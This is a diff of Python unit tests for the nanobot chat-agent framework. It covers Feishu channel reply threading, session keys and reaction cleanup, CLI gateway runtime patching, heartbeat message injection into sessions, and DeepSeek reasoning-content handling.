ch._stream_bufs["oc_chat1"] = _FeishuStreamBuf(
|
||||||
text="Done", card_id="card_1", sequence=3, last_edit=0.0,
|
text="Done", card_id="card_1", sequence=3, last_edit=0.0,
|
||||||
)
|
)
|
||||||
|
ch._reaction_ids["om_001"] = "rx_42"
|
||||||
ch._client.cardkit.v1.card_element.content.return_value = MagicMock(success=MagicMock(return_value=True))
|
ch._client.cardkit.v1.card_element.content.return_value = MagicMock(success=MagicMock(return_value=True))
|
||||||
ch._client.cardkit.v1.card.settings.return_value = MagicMock(success=MagicMock(return_value=True))
|
ch._client.cardkit.v1.card.settings.return_value = MagicMock(success=MagicMock(return_value=True))
|
||||||
ch._remove_reaction = AsyncMock()
|
ch._remove_reaction = AsyncMock()
|
||||||
|
|
||||||
await ch.send_delta(
|
await ch.send_delta(
|
||||||
"oc_chat1", "",
|
"oc_chat1", "",
|
||||||
metadata={"_stream_end": True, "message_id": "om_001", "reaction_id": "rx_42"},
|
metadata={"_stream_end": True, "message_id": "om_001"},
|
||||||
)
|
)
|
||||||
|
|
||||||
ch._remove_reaction.assert_called_once_with("om_001", "rx_42")
|
ch._remove_reaction.assert_called_once_with("om_001", "rx_42")
|
||||||
@ -189,7 +208,7 @@ class TestStreamEndReactionCleanup:
|
|||||||
|
|
||||||
await ch.send_delta(
|
await ch.send_delta(
|
||||||
"oc_chat1", "",
|
"oc_chat1", "",
|
||||||
metadata={"_stream_end": True, "reaction_id": "rx_42"},
|
metadata={"_stream_end": True},
|
||||||
)
|
)
|
||||||
|
|
||||||
ch._remove_reaction.assert_not_called()
|
ch._remove_reaction.assert_not_called()
|
||||||
|
|||||||
@ -3,7 +3,7 @@ import asyncio
|
|||||||
import json
|
import json
|
||||||
from pathlib import Path
|
from pathlib import Path
|
||||||
from types import SimpleNamespace
|
from types import SimpleNamespace
|
||||||
from unittest.mock import MagicMock, patch
|
from unittest.mock import AsyncMock, MagicMock, patch
|
||||||
|
|
||||||
import pytest
|
import pytest
|
||||||
|
|
||||||
@ -21,18 +21,18 @@ from nanobot.bus.events import OutboundMessage
|
|||||||
from nanobot.bus.queue import MessageBus
|
from nanobot.bus.queue import MessageBus
|
||||||
from nanobot.channels.feishu import FeishuChannel, FeishuConfig
|
from nanobot.channels.feishu import FeishuChannel, FeishuConfig
|
||||||
|
|
||||||
|
|
||||||
# ---------------------------------------------------------------------------
|
# ---------------------------------------------------------------------------
|
||||||
# Helpers
|
# Helpers
|
||||||
# ---------------------------------------------------------------------------
|
# ---------------------------------------------------------------------------
|
||||||
|
|
||||||
def _make_feishu_channel(reply_to_message: bool = False) -> FeishuChannel:
|
def _make_feishu_channel(reply_to_message: bool = False, group_policy: str = "mention") -> FeishuChannel:
|
||||||
config = FeishuConfig(
|
config = FeishuConfig(
|
||||||
enabled=True,
|
enabled=True,
|
||||||
app_id="cli_test",
|
app_id="cli_test",
|
||||||
app_secret="secret",
|
app_secret="secret",
|
||||||
allow_from=["*"],
|
allow_from=["*"],
|
||||||
reply_to_message=reply_to_message,
|
reply_to_message=reply_to_message,
|
||||||
|
group_policy=group_policy,
|
||||||
)
|
)
|
||||||
channel = FeishuChannel(config, MessageBus())
|
channel = FeishuChannel(config, MessageBus())
|
||||||
channel._client = MagicMock()
|
channel._client = MagicMock()
|
||||||
@ -443,3 +443,288 @@ async def test_on_message_no_extra_api_call_when_no_parent_id() -> None:
|
|||||||
|
|
||||||
channel._client.im.v1.message.get.assert_not_called()
|
channel._client.im.v1.message.get.assert_not_called()
|
||||||
assert len(captured) == 1
|
assert len(captured) == 1
|
||||||
|
|
||||||
|
|
||||||
|
# ---------------------------------------------------------------------------
|
||||||
|
# Session key derivation tests
|
||||||
|
# ---------------------------------------------------------------------------
|
||||||
|
|
||||||
|
|
||||||
|
@pytest.mark.asyncio
|
||||||
|
async def test_session_key_group_with_root_id_is_thread_scoped() -> None:
|
||||||
|
"""Group message with root_id gets a thread-scoped session key."""
|
||||||
|
channel = _make_feishu_channel(group_policy="open")
|
||||||
|
bus_spy = []
|
||||||
|
original_publish = channel.bus.publish_inbound
|
||||||
|
|
||||||
|
async def capture(msg):
|
||||||
|
bus_spy.append(msg)
|
||||||
|
await original_publish(msg)
|
||||||
|
|
||||||
|
channel.bus.publish_inbound = capture
|
||||||
|
channel._download_and_save_media = AsyncMock(return_value=(None, ""))
|
||||||
|
channel.transcribe_audio = AsyncMock(return_value="")
|
||||||
|
channel._add_reaction = AsyncMock(return_value=None)
|
||||||
|
|
||||||
|
event = _make_feishu_event(
|
||||||
|
chat_type="group",
|
||||||
|
content='{"text": "hello"}',
|
||||||
|
root_id="om_root123",
|
||||||
|
message_id="om_child456",
|
||||||
|
)
|
||||||
|
await channel._on_message(event)
|
||||||
|
|
||||||
|
assert len(bus_spy) == 1
|
||||||
|
assert bus_spy[0].session_key == "feishu:oc_abc:om_root123"
|
||||||
|
|
||||||
|
|
||||||
|
@pytest.mark.asyncio
|
||||||
|
async def test_session_key_group_no_root_id_uses_message_id() -> None:
|
||||||
|
"""Group message without root_id gets session keyed by message_id (per-message session)."""
|
||||||
|
channel = _make_feishu_channel(group_policy="open")
|
||||||
|
bus_spy = []
|
||||||
|
original_publish = channel.bus.publish_inbound
|
||||||
|
|
||||||
|
async def capture(msg):
|
||||||
|
bus_spy.append(msg)
|
||||||
|
await original_publish(msg)
|
||||||
|
|
||||||
|
channel.bus.publish_inbound = capture
|
||||||
|
channel._download_and_save_media = AsyncMock(return_value=(None, ""))
|
||||||
|
channel.transcribe_audio = AsyncMock(return_value="")
|
||||||
|
channel._add_reaction = AsyncMock(return_value=None)
|
||||||
|
|
||||||
|
event = _make_feishu_event(
|
||||||
|
chat_type="group",
|
||||||
|
content='{"text": "hello"}',
|
||||||
|
root_id=None,
|
||||||
|
message_id="om_001",
|
||||||
|
)
|
||||||
|
await channel._on_message(event)
|
||||||
|
|
||||||
|
assert len(bus_spy) == 1
|
||||||
|
assert bus_spy[0].session_key == "feishu:oc_abc:om_001"
|
||||||
|
|
||||||
|
|
||||||
|
@pytest.mark.asyncio
|
||||||
|
async def test_session_key_private_chat_no_override() -> None:
|
||||||
|
"""Private chat never overrides session key (consistent with Telegram/Slack)."""
|
||||||
|
channel = _make_feishu_channel()
|
||||||
|
bus_spy = []
|
||||||
|
original_publish = channel.bus.publish_inbound
|
||||||
|
|
||||||
|
async def capture(msg):
|
||||||
|
bus_spy.append(msg)
|
||||||
|
await original_publish(msg)
|
||||||
|
|
||||||
|
channel.bus.publish_inbound = capture
|
||||||
|
channel._download_and_save_media = AsyncMock(return_value=(None, ""))
|
||||||
|
channel.transcribe_audio = AsyncMock(return_value="")
|
||||||
|
channel._add_reaction = AsyncMock(return_value=None)
|
||||||
|
|
||||||
|
event = _make_feishu_event(
|
||||||
|
chat_type="p2p",
|
||||||
|
content='{"text": "hello"}',
|
||||||
|
root_id=None,
|
||||||
|
message_id="om_001",
|
||||||
|
)
|
||||||
|
await channel._on_message(event)
|
||||||
|
|
||||||
|
assert len(bus_spy) == 1
|
||||||
|
assert bus_spy[0].session_key_override is None
|
||||||
|
|
||||||
|
|
||||||
|
# ---------------------------------------------------------------------------
|
||||||
|
# reply_in_thread tests
|
||||||
|
# ---------------------------------------------------------------------------
|
||||||
|
|
||||||
|
|
||||||
|
@pytest.mark.asyncio
|
||||||
|
async def test_reply_uses_reply_in_thread_when_enabled() -> None:
|
||||||
|
"""When reply_to_message is True, reply includes reply_in_thread=True."""
|
||||||
|
channel = _make_feishu_channel(reply_to_message=True)
|
||||||
|
|
||||||
|
reply_resp = MagicMock()
|
||||||
|
reply_resp.success.return_value = True
|
||||||
|
channel._client.im.v1.message.reply.return_value = reply_resp
|
||||||
|
|
||||||
|
await channel.send(OutboundMessage(
|
||||||
|
channel="feishu",
|
||||||
|
chat_id="oc_abc",
|
||||||
|
content="hello",
|
||||||
|
metadata={"message_id": "om_001"},
|
||||||
|
))
|
||||||
|
|
||||||
|
channel._client.im.v1.message.reply.assert_called_once()
|
||||||
|
call_args = channel._client.im.v1.message.reply.call_args
|
||||||
|
request = call_args[0][0]
|
||||||
|
assert request.request_body.reply_in_thread is True
|
||||||
|
|
||||||
|
|
||||||
|
@pytest.mark.asyncio
|
||||||
|
async def test_reply_without_reply_in_thread_when_disabled() -> None:
|
||||||
|
"""When reply_to_message is False, reply does NOT use reply_in_thread."""
|
||||||
|
channel = _make_feishu_channel(reply_to_message=False)
|
||||||
|
|
||||||
|
create_resp = MagicMock()
|
||||||
|
create_resp.success.return_value = True
|
||||||
|
channel._client.im.v1.message.create.return_value = create_resp
|
||||||
|
|
||||||
|
await channel.send(OutboundMessage(
|
||||||
|
channel="feishu",
|
||||||
|
chat_id="oc_abc",
|
||||||
|
content="hello",
|
||||||
|
))
|
||||||
|
|
||||||
|
# No message_id in metadata → no reply attempt, direct create
|
||||||
|
channel._client.im.v1.message.create.assert_called_once()
|
||||||
|
|
||||||
|
|
||||||
|
@pytest.mark.asyncio
|
||||||
|
async def test_reply_keeps_fallback_when_reply_fails() -> None:
|
||||||
|
"""Even with reply_to_message=True, fallback to create on reply failure."""
|
||||||
|
channel = _make_feishu_channel(reply_to_message=True)
|
||||||
|
|
||||||
|
reply_resp = MagicMock()
|
||||||
|
reply_resp.success.return_value = False
|
||||||
|
reply_resp.code = 99991400
|
||||||
|
reply_resp.msg = "rate limited"
|
||||||
|
channel._client.im.v1.message.reply.return_value = reply_resp
|
||||||
|
|
||||||
|
create_resp = MagicMock()
|
||||||
|
create_resp.success.return_value = True
|
||||||
|
channel._client.im.v1.message.create.return_value = create_resp
|
||||||
|
|
||||||
|
await channel.send(OutboundMessage(
|
||||||
|
channel="feishu",
|
||||||
|
chat_id="oc_abc",
|
||||||
|
content="hello",
|
||||||
|
metadata={"message_id": "om_001"},
|
||||||
|
))
|
||||||
|
|
||||||
|
channel._client.im.v1.message.reply.assert_called()
|
||||||
|
channel._client.im.v1.message.create.assert_called()
|
||||||
|
|
||||||
|
|
||||||
|
@pytest.mark.asyncio
|
||||||
|
async def test_reply_no_reply_in_thread_for_p2p_chat() -> None:
|
||||||
|
"""reply_in_thread should NOT be set for p2p chats (identified by chat_type)."""
|
||||||
|
channel = _make_feishu_channel(reply_to_message=True)
|
||||||
|
|
||||||
|
reply_resp = MagicMock()
|
||||||
|
reply_resp.success.return_value = True
|
||||||
|
channel._client.im.v1.message.reply.return_value = reply_resp
|
||||||
|
|
||||||
|
await channel.send(OutboundMessage(
|
||||||
|
channel="feishu",
|
||||||
|
chat_id="oc_abc", # p2p chats also use oc_ prefix
|
||||||
|
content="hello",
|
||||||
|
metadata={"message_id": "om_001", "chat_type": "p2p"},
|
||||||
|
))
|
||||||
|
|
||||||
|
channel._client.im.v1.message.reply.assert_called_once()
|
||||||
|
call_args = channel._client.im.v1.message.reply.call_args
|
||||||
|
request = call_args[0][0]
|
||||||
|
assert request.request_body.reply_in_thread is not True
|
||||||
|
|
||||||
|
|
||||||
|
@pytest.mark.asyncio
|
||||||
|
async def test_reply_uses_reply_in_thread_for_group_chat() -> None:
|
||||||
|
"""reply_in_thread should be True for group chats (identified by chat_type)."""
|
||||||
|
channel = _make_feishu_channel(reply_to_message=True)
|
||||||
|
|
||||||
|
reply_resp = MagicMock()
|
||||||
|
reply_resp.success.return_value = True
|
||||||
|
channel._client.im.v1.message.reply.return_value = reply_resp
|
||||||
|
|
||||||
|
await channel.send(OutboundMessage(
|
||||||
|
channel="feishu",
|
||||||
|
chat_id="oc_abc",
|
||||||
|
content="hello",
|
||||||
|
metadata={"message_id": "om_001", "chat_type": "group"},
|
||||||
|
))
|
||||||
|
|
||||||
|
channel._client.im.v1.message.reply.assert_called_once()
|
||||||
|
call_args = channel._client.im.v1.message.reply.call_args
|
||||||
|
request = call_args[0][0]
|
||||||
|
assert request.request_body.reply_in_thread is True
|
||||||
|
|
||||||
|
|
||||||
|
@pytest.mark.asyncio
|
||||||
|
async def test_reply_targets_message_id_when_in_topic() -> None:
|
||||||
|
"""When inbound message is inside a topic (root_id != message_id),
|
||||||
|
the reply should target the inbound message_id (not root_id).
|
||||||
|
The Feishu Reply API keeps the response in the same topic
|
||||||
|
automatically when the target message is already inside a topic."""
|
||||||
|
channel = _make_feishu_channel(reply_to_message=True)
|
||||||
|
|
||||||
|
reply_resp = MagicMock()
|
||||||
|
reply_resp.success.return_value = True
|
||||||
|
channel._client.im.v1.message.reply.return_value = reply_resp
|
||||||
|
|
||||||
|
await channel.send(OutboundMessage(
|
||||||
|
channel="feishu",
|
||||||
|
chat_id="oc_abc",
|
||||||
|
content="hello",
|
||||||
|
metadata={
|
||||||
|
"message_id": "om_child456",
|
||||||
|
"chat_type": "group",
|
||||||
|
"root_id": "om_root123",
|
||||||
|
},
|
||||||
|
))
|
||||||
|
|
||||||
|
channel._client.im.v1.message.reply.assert_called_once()
|
||||||
|
call_args = channel._client.im.v1.message.reply.call_args
|
||||||
|
request = call_args[0][0]
|
||||||
|
# Should reply to the inbound message_id, not the root
|
||||||
|
assert request.message_id == "om_child456"
|
||||||
|
assert request.request_body.reply_in_thread is True
|
||||||
|
|
||||||
|
|
||||||
|
def test_on_reaction_added_stores_reaction_id() -> None:
|
||||||
|
"""_on_reaction_added stores the returned reaction_id in _reaction_ids."""
|
||||||
|
channel = _make_feishu_channel()
|
||||||
|
loop = asyncio.new_event_loop()
|
||||||
|
try:
|
||||||
|
task = loop.create_task(asyncio.sleep(0, result="reaction_abc"))
|
||||||
|
loop.run_until_complete(task)
|
||||||
|
channel._on_reaction_added("om_001", task)
|
||||||
|
finally:
|
||||||
|
loop.close()
|
||||||
|
|
||||||
|
assert channel._reaction_ids["om_001"] == "reaction_abc"
|
||||||
|
|
||||||
|
|
||||||
|
def test_on_reaction_added_skips_none_result() -> None:
|
||||||
|
"""_on_reaction_added does not store None results."""
|
||||||
|
channel = _make_feishu_channel()
|
||||||
|
loop = asyncio.new_event_loop()
|
||||||
|
try:
|
||||||
|
task = loop.create_task(asyncio.sleep(0, result=None))
|
||||||
|
loop.run_until_complete(task)
|
||||||
|
channel._on_reaction_added("om_001", task)
|
||||||
|
finally:
|
||||||
|
loop.close()
|
||||||
|
|
||||||
|
assert "om_001" not in channel._reaction_ids
|
||||||
|
|
||||||
|
|
||||||
|
def test_on_background_task_done_removes_from_set() -> None:
|
||||||
|
"""_on_background_task_done removes task from tracking set."""
|
||||||
|
channel = _make_feishu_channel()
|
||||||
|
loop = asyncio.new_event_loop()
|
||||||
|
try:
|
||||||
|
async def _fail():
|
||||||
|
raise RuntimeError("test failure")
|
||||||
|
|
||||||
|
task = loop.create_task(_fail())
|
||||||
|
channel._background_tasks.add(task)
|
||||||
|
try:
|
||||||
|
loop.run_until_complete(task)
|
||||||
|
except RuntimeError:
|
||||||
|
pass # expected
|
||||||
|
channel._on_background_task_done(task)
|
||||||
|
finally:
|
||||||
|
loop.close()
|
||||||
|
|
||||||
|
assert task not in channel._background_tasks
|
||||||
|
|||||||
@ -8,6 +8,7 @@ from unittest.mock import AsyncMock, MagicMock, patch
|
|||||||
import pytest
|
import pytest
|
||||||
from typer.testing import CliRunner
|
from typer.testing import CliRunner
|
||||||
|
|
||||||
|
from nanobot.agent.runtime import AgentRuntime
|
||||||
from nanobot.bus.events import OutboundMessage
|
from nanobot.bus.events import OutboundMessage
|
||||||
from nanobot.cli.commands import _make_provider, app
|
from nanobot.cli.commands import _make_provider, app
|
||||||
from nanobot.config.schema import Config
|
from nanobot.config.schema import Config
|
||||||
@ -776,6 +777,15 @@ def _stop_gateway_provider(_config) -> object:
|
|||||||
raise _StopGatewayError("stop")
|
raise _StopGatewayError("stop")
|
||||||
|
|
||||||
|
|
||||||
|
def _test_agent_runtime(provider: object, config: Config) -> AgentRuntime:
|
||||||
|
return AgentRuntime(
|
||||||
|
provider=provider,
|
||||||
|
model=config.agents.defaults.model,
|
||||||
|
context_window_tokens=config.agents.defaults.context_window_tokens,
|
||||||
|
signature=("test",),
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
def _patch_cli_command_runtime(
|
def _patch_cli_command_runtime(
|
||||||
monkeypatch,
|
monkeypatch,
|
||||||
config: Config,
|
config: Config,
|
||||||
@ -788,6 +798,8 @@ def _patch_cli_command_runtime(
|
|||||||
cron_service=None,
|
cron_service=None,
|
||||||
get_cron_dir=None,
|
get_cron_dir=None,
|
||||||
) -> None:
|
) -> None:
|
||||||
|
provider_factory = make_provider or (lambda _config: object())
|
||||||
|
|
||||||
monkeypatch.setattr(
|
monkeypatch.setattr(
|
||||||
"nanobot.config.loader.set_config_path",
|
"nanobot.config.loader.set_config_path",
|
||||||
set_config_path or (lambda _path: None),
|
set_config_path or (lambda _path: None),
|
||||||
@ -800,7 +812,15 @@ def _patch_cli_command_runtime(
|
|||||||
)
|
)
|
||||||
monkeypatch.setattr(
|
monkeypatch.setattr(
|
||||||
"nanobot.cli.commands._make_provider",
|
"nanobot.cli.commands._make_provider",
|
||||||
make_provider or (lambda _config: object()),
|
provider_factory,
|
||||||
|
)
|
||||||
|
monkeypatch.setattr(
|
||||||
|
"nanobot.agent.runtime.build_agent_runtime",
|
||||||
|
lambda _config: _test_agent_runtime(provider_factory(_config), _config),
|
||||||
|
)
|
||||||
|
monkeypatch.setattr(
|
||||||
|
"nanobot.agent.runtime.load_agent_runtime",
|
||||||
|
lambda _config_path=None: _test_agent_runtime(provider_factory(config), config),
|
||||||
)
|
)
|
||||||
|
|
||||||
if message_bus is not None:
|
if message_bus is not None:
|
||||||
@ -941,8 +961,36 @@ def test_gateway_cron_evaluator_receives_scheduled_reminder_context(
|
|||||||
monkeypatch.setattr("nanobot.config.loader.load_config", lambda _path=None: config)
|
monkeypatch.setattr("nanobot.config.loader.load_config", lambda _path=None: config)
|
||||||
monkeypatch.setattr("nanobot.cli.commands.sync_workspace_templates", lambda _path: None)
|
monkeypatch.setattr("nanobot.cli.commands.sync_workspace_templates", lambda _path: None)
|
||||||
monkeypatch.setattr("nanobot.cli.commands._make_provider", lambda _config: provider)
|
monkeypatch.setattr("nanobot.cli.commands._make_provider", lambda _config: provider)
|
||||||
|
monkeypatch.setattr(
|
||||||
|
"nanobot.agent.runtime.build_agent_runtime",
|
||||||
|
lambda _config: _test_agent_runtime(provider, _config),
|
||||||
|
)
|
||||||
|
monkeypatch.setattr(
|
||||||
|
"nanobot.agent.runtime.load_agent_runtime",
|
||||||
|
lambda _config_path=None: _test_agent_runtime(provider, config),
|
||||||
|
)
|
||||||
monkeypatch.setattr("nanobot.bus.queue.MessageBus", lambda: bus)
|
monkeypatch.setattr("nanobot.bus.queue.MessageBus", lambda: bus)
|
||||||
monkeypatch.setattr("nanobot.session.manager.SessionManager", lambda _workspace: object())
|
|
||||||
|
class _FakeSession:
|
||||||
|
def __init__(self) -> None:
|
||||||
|
self.messages = []
|
||||||
|
|
||||||
|
def add_message(self, role: str, content: str, **kwargs) -> None:
|
||||||
|
self.messages.append({"role": role, "content": content, **kwargs})
|
||||||
|
|
||||||
|
class _FakeSessionManager:
|
||||||
|
def __init__(self, _workspace: Path) -> None:
|
||||||
|
self.session = _FakeSession()
|
||||||
|
seen["session_manager"] = self
|
||||||
|
|
||||||
|
def get_or_create(self, key: str) -> _FakeSession:
|
||||||
|
seen["session_key"] = key
|
||||||
|
return self.session
|
||||||
|
|
||||||
|
def save(self, session: _FakeSession) -> None:
|
||||||
|
seen["saved_session"] = session
|
||||||
|
|
||||||
|
monkeypatch.setattr("nanobot.session.manager.SessionManager", _FakeSessionManager)
|
||||||
|
|
||||||
class _FakeCron:
|
class _FakeCron:
|
||||||
def __init__(self, _store_path: Path) -> None:
|
def __init__(self, _store_path: Path) -> None:
|
||||||
@ -1030,6 +1078,16 @@ def test_gateway_cron_evaluator_receives_scheduled_reminder_context(
|
|||||||
content="Time to stretch.",
|
content="Time to stretch.",
|
||||||
)
|
)
|
||||||
)
|
)
|
||||||
|
assert seen["session_key"] == "telegram:user-1"
|
||||||
|
saved_session = seen["saved_session"]
|
||||||
|
assert isinstance(saved_session, _FakeSession)
|
||||||
|
assert saved_session.messages == [
|
||||||
|
{
|
||||||
|
"role": "assistant",
|
||||||
|
"content": "Time to stretch.",
|
||||||
|
"_channel_delivery": True,
|
||||||
|
}
|
||||||
|
]
|
||||||
|
|
||||||
|
|
||||||
def test_gateway_cron_job_suppresses_intermediate_progress(
|
def test_gateway_cron_job_suppresses_intermediate_progress(
|
||||||
@ -1052,6 +1110,14 @@ def test_gateway_cron_job_suppresses_intermediate_progress(
|
|||||||
monkeypatch.setattr("nanobot.config.loader.load_config", lambda _path=None: config)
|
monkeypatch.setattr("nanobot.config.loader.load_config", lambda _path=None: config)
|
||||||
monkeypatch.setattr("nanobot.cli.commands.sync_workspace_templates", lambda _path: None)
|
monkeypatch.setattr("nanobot.cli.commands.sync_workspace_templates", lambda _path: None)
|
||||||
monkeypatch.setattr("nanobot.cli.commands._make_provider", lambda _config: object())
|
monkeypatch.setattr("nanobot.cli.commands._make_provider", lambda _config: object())
|
||||||
|
monkeypatch.setattr(
|
||||||
|
"nanobot.agent.runtime.build_agent_runtime",
|
||||||
|
lambda _config: _test_agent_runtime(object(), _config),
|
||||||
|
)
|
||||||
|
monkeypatch.setattr(
|
||||||
|
"nanobot.agent.runtime.load_agent_runtime",
|
||||||
|
lambda _config_path=None: _test_agent_runtime(object(), config),
|
||||||
|
)
|
||||||
monkeypatch.setattr("nanobot.bus.queue.MessageBus", lambda: bus)
|
monkeypatch.setattr("nanobot.bus.queue.MessageBus", lambda: bus)
|
||||||
monkeypatch.setattr("nanobot.session.manager.SessionManager", lambda _workspace: object())
|
monkeypatch.setattr("nanobot.session.manager.SessionManager", lambda _workspace: object())
|
||||||
|
|
||||||
|
|||||||
120
tests/heartbeat/test_heartbeat_context_bridge.py
Normal file
120
tests/heartbeat/test_heartbeat_context_bridge.py
Normal file
@ -0,0 +1,120 @@
|
|||||||
|
"""Tests for heartbeat context bridge — injecting delivered messages into channel session."""
|
||||||
|
|
||||||
|
from nanobot.session.manager import SessionManager
|
||||||
|
|
||||||
|
|
||||||
|
class TestHeartbeatContextBridge:
|
||||||
|
"""Verify that on_heartbeat_notify injects the assistant message into the
|
||||||
|
channel session so user replies have conversational context."""
|
||||||
|
|
||||||
|
def test_notify_injects_into_channel_session(self, tmp_path):
|
||||||
|
"""After notify, the target channel session should contain the
|
||||||
|
heartbeat response as an assistant turn."""
|
||||||
|
session_mgr = SessionManager(tmp_path / "sessions")
|
||||||
|
target_key = "telegram:12345"
|
||||||
|
|
||||||
|
# Simulate: session exists with one user message
|
||||||
|
target_session = session_mgr.get_or_create(target_key)
|
||||||
|
target_session.add_message("user", "hello earlier")
|
||||||
|
session_mgr.save(target_session)
|
||||||
|
|
||||||
|
# Simulate what on_heartbeat_notify does
|
||||||
|
target_session = session_mgr.get_or_create(target_key)
|
||||||
|
target_session.add_message(
|
||||||
|
"assistant",
|
||||||
|
"3 new emails — invoice, meeting, proposal.",
|
||||||
|
_channel_delivery=True,
|
||||||
|
)
|
||||||
|
session_mgr.save(target_session)
|
||||||
|
|
||||||
|
# Reload and verify
|
||||||
|
reloaded = session_mgr.get_or_create(target_key)
|
||||||
|
messages = reloaded.get_history(max_messages=0)
|
||||||
|
roles = [m["role"] for m in messages]
|
||||||
|
assert roles == ["user", "assistant"]
|
||||||
|
assert "3 new emails" in messages[-1]["content"]
|
||||||
|
|
||||||
|
def test_reply_after_injection_has_context(self, tmp_path):
|
||||||
|
"""Simulates the full flow: prior conversation exists, heartbeat
|
||||||
|
injects, then user replies. The session should have the heartbeat
|
||||||
|
message visible in get_history so the model sees the context."""
|
||||||
|
session_mgr = SessionManager(tmp_path / "sessions")
|
||||||
|
target_key = "telegram:12345"
|
||||||
|
|
||||||
|
# Pre-existing conversation (user has chatted before)
|
||||||
|
session = session_mgr.get_or_create(target_key)
|
||||||
|
session.add_message("user", "Hey")
|
||||||
|
session.add_message("assistant", "Hi there!")
|
||||||
|
session_mgr.save(session)
|
||||||
|
|
||||||
|
# Step 1: heartbeat injects assistant message
|
||||||
|
session = session_mgr.get_or_create(target_key)
|
||||||
|
session.add_message(
|
||||||
|
"assistant",
|
||||||
|
"If you want, I can mark that email as read.",
|
||||||
|
_channel_delivery=True,
|
||||||
|
)
|
||||||
|
session_mgr.save(session)
|
||||||
|
|
||||||
|
# Step 2: user replies "Sure"
|
||||||
|
session = session_mgr.get_or_create(target_key)
|
||||||
|
session.add_message("user", "Sure")
|
||||||
|
session_mgr.save(session)
|
||||||
|
|
||||||
|
# Verify: get_history includes the heartbeat injection
|
||||||
|
reloaded = session_mgr.get_or_create(target_key)
|
||||||
|
history = reloaded.get_history(max_messages=0)
|
||||||
|
roles = [m["role"] for m in history]
|
||||||
|
assert roles == ["user", "assistant", "assistant", "user"]
|
||||||
|
assert "mark that email" in history[2]["content"]
|
||||||
|
assert history[3]["content"] == "Sure"
|
||||||
|
|
||||||
|
def test_injection_does_not_duplicate_on_existing_history(self, tmp_path):
|
||||||
|
"""If the channel session already has messages, the injection
|
||||||
|
appends cleanly without corruption."""
|
||||||
|
session_mgr = SessionManager(tmp_path / "sessions")
|
||||||
|
target_key = "telegram:12345"
|
||||||
|
|
||||||
|
# Pre-existing conversation
|
||||||
|
session = session_mgr.get_or_create(target_key)
|
||||||
|
session.add_message("user", "What time is it?")
|
||||||
|
session.add_message("assistant", "It's 2pm.")
|
||||||
|
session.add_message("user", "Thanks")
|
||||||
|
session_mgr.save(session)
|
||||||
|
|
||||||
|
# Heartbeat injects
|
||||||
|
session = session_mgr.get_or_create(target_key)
|
||||||
|
session.add_message(
|
||||||
|
"assistant",
|
||||||
|
"You have a meeting in 30 minutes.",
|
||||||
|
_channel_delivery=True,
|
||||||
|
)
|
||||||
|
session_mgr.save(session)
|
||||||
|
|
||||||
|
# Verify
|
||||||
|
reloaded = session_mgr.get_or_create(target_key)
|
||||||
|
history = reloaded.get_history(max_messages=0)
|
||||||
|
roles = [m["role"] for m in history]
|
||||||
|
assert roles == ["user", "assistant", "user", "assistant"]
|
||||||
|
assert "meeting in 30 minutes" in history[-1]["content"]
|
||||||
|
|
||||||
|
def test_reply_after_injection_to_empty_session_keeps_context(self, tmp_path):
|
||||||
|
"""A user replying to the first delivered message still sees that context."""
|
||||||
|
session_mgr = SessionManager(tmp_path / "sessions")
|
||||||
|
target_key = "telegram:99999"
|
||||||
|
|
||||||
|
session = session_mgr.get_or_create(target_key)
|
||||||
|
session.add_message(
|
||||||
|
"assistant",
|
||||||
|
"Weather alert: sandstorm expected at 4pm.",
|
||||||
|
_channel_delivery=True,
|
||||||
|
)
|
||||||
|
session.add_message("user", "Sure")
|
||||||
|
session_mgr.save(session)
|
||||||
|
|
||||||
|
reloaded = session_mgr.get_or_create(target_key)
|
||||||
|
history = reloaded.get_history(max_messages=0)
|
||||||
|
assert len(history) == 2
|
||||||
|
assert history[0]["role"] == "assistant"
|
||||||
|
assert "sandstorm" in history[0]["content"]
|
||||||
|
assert history[1] == {"role": "user", "content": "Sure"}
|
||||||
@ -585,6 +585,81 @@ def test_openai_compat_preserves_message_level_reasoning_fields() -> None:
|
|||||||
assert sanitized[1]["tool_calls"][0]["extra_content"] == {"google": {"thought_signature": "sig"}}
|
assert sanitized[1]["tool_calls"][0]["extra_content"] == {"google": {"thought_signature": "sig"}}
|
||||||
|
|
||||||
|
|
||||||
|
def _deepseek_kwargs(messages: list[dict]) -> dict:
|
||||||
|
with patch("nanobot.providers.openai_compat_provider.AsyncOpenAI"):
|
||||||
|
provider = OpenAICompatProvider(
|
||||||
|
api_key="sk-test",
|
||||||
|
default_model="deepseek-v4-flash",
|
||||||
|
spec=find_by_name("deepseek"),
|
||||||
|
)
|
||||||
|
|
||||||
|
return provider._build_kwargs(
|
||||||
|
messages=messages,
|
||||||
|
tools=None,
|
||||||
|
model="deepseek-v4-flash",
|
||||||
|
max_tokens=1024,
|
||||||
|
temperature=0.7,
|
||||||
|
reasoning_effort="high",
|
||||||
|
tool_choice=None,
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
def _tool_call(call_id: str) -> dict:
|
||||||
|
return {
|
||||||
|
"id": call_id,
|
||||||
|
"type": "function",
|
||||||
|
"function": {"name": "my", "arguments": "{}"},
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
def test_deepseek_thinking_drops_tool_history_missing_reasoning_content() -> None:
|
||||||
|
kwargs = _deepseek_kwargs([
|
||||||
|
{"role": "system", "content": "system"},
|
||||||
|
{"role": "user", "content": "can we use wechat?"},
|
||||||
|
{"role": "assistant", "content": "", "tool_calls": [_tool_call("call_bad")]},
|
||||||
|
{"role": "tool", "tool_call_id": "call_bad", "name": "my", "content": "channels"},
|
||||||
|
{"role": "user", "content": "continue"},
|
||||||
|
])
|
||||||
|
|
||||||
|
assert kwargs["messages"] == [
|
||||||
|
{"role": "system", "content": "system"},
|
||||||
|
{"role": "user", "content": "continue"},
|
||||||
|
]
|
||||||
|
|
||||||
|
|
||||||
|
def test_deepseek_thinking_keeps_tool_history_with_reasoning_content() -> None:
|
||||||
|
kwargs = _deepseek_kwargs([
|
||||||
|
{"role": "user", "content": "can we use wechat?"},
|
||||||
|
{
|
||||||
|
"role": "assistant",
|
||||||
|
"content": "",
|
||||||
|
"reasoning_content": "I should inspect supported channels.",
|
||||||
|
"tool_calls": [_tool_call("call_good")],
|
||||||
|
},
|
||||||
|
{"role": "tool", "tool_call_id": "call_good", "name": "my", "content": "channels"},
|
||||||
|
{"role": "user", "content": "continue"},
|
||||||
|
])
|
||||||
|
|
||||||
|
assistant = kwargs["messages"][1]
|
||||||
|
assert assistant["role"] == "assistant"
|
||||||
|
assert assistant["reasoning_content"] == "I should inspect supported channels."
|
